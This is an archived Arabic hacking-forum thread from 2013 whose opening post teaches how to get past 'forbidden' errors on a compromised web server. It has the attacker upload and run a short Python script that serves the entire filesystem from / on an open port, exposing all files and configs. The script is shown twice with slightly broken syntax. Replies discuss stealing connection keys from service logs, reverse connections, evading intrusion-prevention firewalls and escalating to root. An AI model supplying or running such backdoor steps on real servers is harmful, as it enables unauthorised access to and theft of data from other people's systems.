:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   .:تخطي الفوربدين عن طريق فتح بورت:. (http://www.vbspiders.com/vb/t67588.html)

ABO-SAGER 05-13-2013 07:07 PM
.:تخطي الفوربدين عن طريق فتح بورت:.
 
السلام عليكم ~

كيف الحال يا أحبتي في لله ~

اليوم معي شرح ان شاء الله راح يعجبكم ~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط ~

ان يكون السيرفر قابل انك تفتح فيه بورت ~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله ~

الخطوة الأولى ~

نرفع السكربت التالي بمتداد py ~


كود PHP:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port 13123

if __name__=='__main__':
    os.chdir('/')
    Handler SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd SocketServer.TCPServer((""port), Handler)

    print("Now open this server on webbrowser at port : " str(port))
    print("example: http://maho.com:" str(port))
    httpd.serve_forever() 

هنا تضع البورت المراد فتحة في السيرفر ~

كود PHP:
port 13123 
الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

كود PHP:
python aa.py 
الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا ~

كود PHP:
http://www.xxx.com:13123 

غير 13123 إلى البورت تبعك ~

والنتيجة ~

http://store2.up-00.com/Apr13/ah458870.png


الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق ~
http://store2.up-00.com/Apr13/Ox758963.png



تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~

oblack 05-13-2013 07:23 PM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Abo-Sagre (المشاركة 462555)
السلام عليكم ~

كيف الحال يا أحبتي في لله ~

اليوم معي شرح ان شاء الله راح يعجبكم ~

اليوم بإذن لله راح نتخطى الفوربدين العنيد مهما كانت قوته ~

شرط ~

ان يكون السيرفر قابل انك تفتح فيه بورت ~

اذا تبغا تعرف السيرفر يسمح انك تفتح بورت ولا لا جرب تسوي اتصال عكسي اذا نجح معك إن شاء 90% راح تتخطى ~

طيب نبدأ على بركة لله ~

الخطوة الأولى ~

نرفع السكربت التالي بمتداد py ~


كود PHP:
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port 13123

if __name__=='__main__':
    os.chdir('/')
    Handler SimpleHTTPServer.SimpleHTTPRequestHandler

    httpd SocketServer.TCPServer((""port), Handler)

    print("Now open this server on webbrowser at port : " str(port))
    print("example: http://maho.com:" str(port))
    httpd.serve_forever() 

هنا تضع البورت المراد فتحة في السيرفر ~

كود PHP:
port 13123 
الأن احفظ السكربت ورفعة على السيرفر ~

بمتداد py ولا تنسا تصرحه 0755 ~

قم بتشغيل السكربت عن طريق الأمر ~

كود PHP:
python aa.py 
الأن الصفحة راح تتطول في التحميل ~

اوك في هذي الحظة افتح صفحة جديدة في المتصفح وافتح رابط الموقع هكذا ~

كود PHP:
http://www.xxx.com:13123 

غير 13123 إلى البورت تبعك ~

والنتيجة ~

http://store2.up-00.com/Apr13/ah458870.png


الأن تستطيع تصفح جميع ملفات السيرفر ~

وهذا الكونفيق ~
http://store2.up-00.com/Apr13/Ox758963.png



تم الشرح بوسطة ~

ABO-SAGER ~

ودمتم سالمين ^_^ ~
طريقة رائعة للقيام بالاتصال العكسي ولكنها لاتجدي نفعا في السيرفرات القوية فا اغلب السيرفرات تقوم بتفعيل الفيرول ووضع رولز تمنع فتح اي بورت الفوربدين مشكلة صلاحيات فاذا كانت صلاحيتك اقل من يوزر بالسيرفر فالمشكلة تكون صعبه جدا

جاري تجريب طريقتك وتطويرها لتخطي عدد من الرولز التي تمنع فتح بورت بالاعتماد على بورتات مفتوحة بالسيرفر لخدمات اخرى و استغلالها بستخادم طريقة البايبنج وايضا المجيك باكيج وجراي تطوير برنامج بهذا الشئن ترقبونا

ملاحظة : استفدت من الفكرة كثيرا ورايح نقوم بتطويرها ان شاء الله بالقريب العاجل وجاري العمل من اللحظة .:12::14:

ABO-SAGER 05-13-2013 08:58 PM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
طيف هل في طريقة نعطل رولز

Cyber Code 05-13-2013 10:24 PM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
http://www.vbspiders.com/vb/t43175.html

كود:
طيف هل في طريقة نعطل رولز
بارك الله فيك, موضوع جميل :)

oblack 05-14-2013 01:38 AM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
اقتباس:
المشاركة الأصلية كتبت بواسطة Abo-Sagre (المشاركة 462559)
طيف هل في طريقة نعطل رولز
في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .:14:

ReD-HaT 05-14-2013 02:04 AM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
موضوع في القمة
تحياتي لك

ABO-SAGER 05-14-2013 06:55 AM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
اقتباس:
المشاركة الأصلية كتبت بواسطة ReD-HaT (المشاركة 462571)
موضوع في القمة
تحياتي لك

الله يحيك

ABO-SAGER 05-14-2013 06:56 AM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
اقتباس:
المشاركة الأصلية كتبت بواسطة oblack (المشاركة 462570)
في اكثر من طريقة تعتمد حول فهمك للرولز المستخدمة في السيرفر ولكن اخطرها السيرفرات التي تستخدم هاردوير فايرول Ips هنا الوضع سيء جدا لانه يسجل كل الترفك بالشبكة و في حال رصدة لأي حركة مشبوهة يقوم على الفور بشكل ألي بوضع رولز جديدة لحجب الاتصال وتنبيه الدعم الفني لهذا يجب ان نعتمد على تخطي الرولز من خلال برامج يستخدمها السيرفر بشكل خدمات مثل smtp ftpssh telnet imap وغيرها من الخدمات .

حيث اني بالغالب اقوم بمحاولة الوصول الى اي ملف لوج لأحد هذه البرامج وسحب ال key الخاص بعملية الاتصال ومن ثم اقوم بعمل اتصال عكسي بنفس البورت المفتوح مستخدم نفس ال key الخاص بالبرنامج و القيام بعملية بايبنج من خلال ربط داينمك مع باقي الخدمات الاخرى بالسيرفر .

اما في حالة الكود الذي قمت بطرحة بالموضوع عليك بفحص بورتات الموقع فأذا وجدت بورت 443 الذي يستخدم غالبا حق ssl في هذه الحالة الامر بسيط اعمل اتصال من خلال البورت 443 , ولكني بالوقت الحالي ابحث عن طريقة الربط داينمك بين منفذ الى منفذ اخر لنفس السيرفر للحصول على صلاحية يوزر من خلال البرنامج الهدف .:14:

مشاء الله عليك باين عليك خبرة في هذا المجال :nosweat:

بنتظارك بعد تتطوير الفكرة

vpn_31 05-14-2013 01:14 PM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
تسلم على الطرح بس للأسف السيرفرات الحديثة مركبين فايرولات :(

oblack 05-19-2013 11:00 PM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
اقتباس:
المشاركة الأصلية كتبت بواسطة ABO-SAGER (المشاركة 462574)
مشاء الله عليك باين عليك خبرة في هذا المجال :nosweat:

بنتظارك بعد تتطوير الفكرة
السلام عليكم اخواني قمت بدراسة الكود بشكل مفصل ومايحدث بالسيرفر للاسف الشديد هو لا يتخطى الفوربدين وانما يستعرض لك الملفات حسب الصلاحيات المتاحة لك وايضا ممكن الاستفادة منه في حال وجود بعض القيود على بورت 80 الخاص بتصفح من ناحية وجود صفحات انديكس تمنعك من رؤية الملفات الموجودة بالمجلد , الشيل costa cgi-station الذي عرضته بموضوعي السابق يحل هذه المشكلة وبطريقة افضل من فتح بورت لانه سوف تواجة مشكله بعد فتح البورت حيث يتعرف عليه نظام الحماية الموجود باللينكس خاصه بالاصدارات الحديثة وتصبح لديك مشكلة انتيرنل سيرفر ايرور مع العلم اني قمت بتجربته بسيرفر نظام اوبينتوا 11 وليس 12 .

وايضا لا يمكنك وضع بورت مفتوح بالسيرفر لان نظام الحماية مباشرة رايح يقوم بكتشاف الكود و تعرف عليه على انه باك دور .

اقوم لان بوضع المرحلة الثانيه من البحث لتطوير الفكرة بستخدام تقنية البايبنج وهيه تقنيه ليست بالسهله لاستغلال الصلاحية من خلال التنقل بين المنافذ المفتوحة واستغلال صلاحية البرامج للحصول على صلاحية يوزر ومن ثم صلاحية روت اتمنى من لدية الخبرة ان يساعدني في اتمام هذا البحث حتى افرغ منه بشكل اسرع .
:14::14::14:

القاتل المتسلسل 05-25-2013 12:53 AM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
طريقة ولا اروع مشكووور اخوي تستاهل تقييم

KaLa$nikoV 06-14-2013 05:49 PM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
بارك الله فيك
يعطيك الف عافيه

V!rus Yasscom 06-28-2013 12:29 AM
رد: .:تخطي الفوربدين عن طريق فتح بورت:.
 
مشكووووووووووور تسلللّم اخي بارك الله فيييك


الساعة الآن 12:44 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0